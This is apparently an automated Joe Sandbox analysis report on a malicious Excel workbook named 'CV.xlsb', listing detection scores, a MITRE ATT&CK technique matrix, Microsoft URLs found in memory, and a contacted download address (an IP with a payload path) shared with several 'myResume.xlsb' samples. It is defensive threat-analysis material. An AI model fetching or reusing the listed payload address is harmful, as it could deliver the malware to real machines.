Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Rundll321LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CV.xlsb10%VirustotalBrowse
CV.xlsb15%ReversingLabsDocument-Word.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://205.185.113.20/BVd1qKwd11%VirustotalBrowse
http://205.185.113.20/BVd1qKwd0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://205.185.113.20/BVd1qKwdtrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
    high
    https://login.microsoftonline.com/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
      high
      https://shell.suite.office.com:1443DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
          high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
            high
            https://cdn.entity.DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://api.addins.omex.office.net/appinfo/queryDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
              high
              https://wus2-000.contentsync.DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://clients.config.office.net/user/v1.0/tenantassociationkeyDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                high
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                  high
                  https://powerlift.acompli.netDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://rpsticket.partnerservices.getmicrosoftkey.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://lookup.onenote.com/lookup/geolocation/v1DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                    high
                    https://cortana.aiDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                      high
                      https://cloudfiles.onenote.com/upload.aspxDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                        high
                        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                          high
                          https://entitlement.diagnosticssdf.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                            high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                              high
                              https://api.aadrm.com/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://ofcrecsvcapi-int.azurewebsites.net/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                high
                                https://api.microsoftstream.com/api/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                  high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                    high
                                    https://cr.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                      high
                                      https://portal.office.com/account/?ref=ClientMeControlDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                        high
                                        https://ecs.office.com/config/v2/OfficeDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                          high
                                          https://graph.ppe.windows.netDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.netDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplateDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://wus2-000.pagecontentsync.DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplateDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetectDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.msDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groupsDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                          high
                                                          https://graph.windows.netDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/apiDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetectDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.jsonDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                      high
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspxDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                  high
                                                                                  https://management.azure.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                    high
                                                                                    https://outlook.office365.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                      high
                                                                                      https://incidents.diagnostics.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                high
                                                                                                https://api.office.netDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                          high
                                                                                                          https://autodiscover-s.outlook.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                high
                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                  high
                                                                                                                  https://management.azure.com/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                    high
                                                                                                                    https://ncus-000.contentsync.DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://login.windows.net/common/oauth2/authorizeDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                      high
                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://graph.windows.net/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                        high
                                                                                                                        https://api.powerbi.com/beta/myorg/importsDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                          high
                                                                                                                          https://devnull.onenote.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                            high
                                                                                                                            https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                              high
                                                                                                                              https://messaging.office.com/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://augloop.office.com/v2DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://skyapi.live.net/Activity/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://clients.config.office.net/user/v1.0/macDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.o365filtering.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://onedrive.live.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://ovisualuiapp.azurewebsites.net/pbiagave/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devicesDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://directory.services.DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://login.windows-ppe.net/common/oauth2/authorizeDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://loki.delve.office.com/api/v1/configuration/officewin32/DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://onedrive.live.com/embed?DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://augloop.office.comDA768304-9386-4C06-A952-5E2BC6B1C13F.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    205.185.113.20
                                                                                                                                                    unknownUnited States
                                                                                                                                                    53667PONYNETUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                    Analysis ID:320216
                                                                                                                                                    Start date:19.11.2020
                                                                                                                                                    Start time:07:12:34
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 10s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:CV.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal76.expl.evad.winXLSB@3/5@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125, 52.109.32.27, 52.109.12.21, 52.109.12.24, 13.64.90.137, 104.42.151.234, 104.43.139.144, 51.11.168.160, 52.155.217.156, 20.54.26.129, 93.184.221.240, 51.104.139.180, 23.10.249.26, 23.10.249.43
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, config.officeapps.live.com, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    205.185.113.20CV.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/BVd1qKwd
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/BVd1qKwd
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
